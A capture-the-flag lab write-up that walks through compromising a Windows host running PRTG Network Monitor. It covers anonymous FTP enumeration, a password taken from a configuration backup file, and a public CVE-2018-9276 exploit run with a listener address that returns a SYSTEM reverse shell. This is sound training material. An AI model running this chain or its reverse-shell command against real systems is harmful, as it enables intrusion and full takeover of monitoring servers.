Enumeration
Nmap result
Nmap scan report for 10.10.10.152
Host is up (0.18s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-04-12T01:51:19
|_ start_date: 2024-04-12T01:48:33
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Check FTP, SMB, and web server are open.
FTP
Since it allows anonymous FTP login, let’s get into the service.
I enumerated directories and found the user.txt from /Users/Public/Desktop.
Also, I found other files as well.
ftp> ls
229 Entering Extended Passive Mode (|||49886|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
04-11-24 09:49PM 34 user.txt
I don’t know what PRTG is. But I will get these files for later use.
HTTP
Next, let’s see what’s on the web page.
Oh, it’s a login page. And it’s called PRTG Network Monitor.
We got the files from something called PRTG from the FTP service!
I tried with the default credential prtgadmin:prtgadmin
but failed.
I checked the files from FTP again.
strings PRTG\ Enterprise\ Console.lnk
/C:\
PROGRA~2
CNB"
PRTGNE~1
!CNB".
PRTGEN~1.EXE
CN)"CN)".
C:\Program Files (x86)\PRTG Network Monitor\PRTG Enterprise Console.exe
netmon
1SPS
1SPS
strings PRTG\ Network\ Monitor.lnk
/C:\
PROGRA~2
CNB"
PRTGNE~1
!CNB".
PRTGGU~1.EXE
CN)"CN)".
C:\Program Files (x86)\PRTG Network Monitor\PRTG GUI Starter.exe
netmon
1SPS
1SPS
I checked both files, but it seems nothing to pick up.
So, I looked at the FTP server again, and I found out there is one more file related to PRTG.
In /Windows directory, there was a file PRTG Configuration.dat
The content of the file is too long. Let’s see the first few sentences.
head PRTG\ Configuration.dat
<?xml version="1.0" encoding="UTF-8"?>
<root version="16" oct="PRTG Network Monitor 18.1.37.13946" saved="2/26/2019 2:54:23 AM" max="2017" guid="{221B25D6-9282-418B-8364-F59561032EE3}" treeversion="0" created="2019-02-02-23-18-27" trial="42f234beedd545338910317db1fca74dbe84030f">
<statistics time="26-02-2019 02:50:23">
<statistic name="State Changes">
OK, we found the version of it.
Let’s google it if there are any vulnerabilities for it.
I found the POC for CVE-2018-9276
https://github.com/A1vinSmith/CVE-2018-9276
However, to use this tool, we need credentials for a user.
So, I looked for the credentials from FTP server again…
After tedious enumerating of directories, I finally found the right place.
The directory was hidden 🙁
I went to C:\programdata\Paessler
ftp> ls
229 Entering Extended Passive Mode (|||51661|)
150 Opening ASCII mode data connection.
08-18-23 08:20AM <DIR> Configuration Auto-Backups
04-11-24 09:49PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
04-11-24 09:49PM <DIR> Logs (Web Server)
04-11-24 09:54PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
04-11-24 11:12PM 1698499 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
226 Transfer complete.
From PRTG Configuration.old.bak, I found the password.
I managed to log in using the password PrTg@dmin2019.
The backup file was created in 2018 and the configuration file was created in 2019.
Ok, login confirmed.
Let’s use the tool we found.
Root privilege
clone the git repo and execute the program
chmod +x exploit.py
./exploit.py -i 10.10.10.152 -p 80 --lhost 10.10.14.3 --lport 80 --user prtgadmin --password PrTg@dmin2019
[+] Listening on [10.10.14.3:80 for the reverse shell!]
listening on [any] 80 ...
[*] Incoming connection (10.10.10.152,51911)
[*] AUTHENTICATE_MESSAGE (\,NETMON)
[*] User NETMON\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.152] 51919
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
We are in!
The root.txt file can be found in C:\Users\Administrator\Desktop
The machine wasn’t that hard. However, directory enumeration in FTP server was tedious.
If I didn’t check the manual from the official website, I wouldn’t be able to find the correct path, because the directory was hidden!
Lesson earned from this challenge. Check the official document.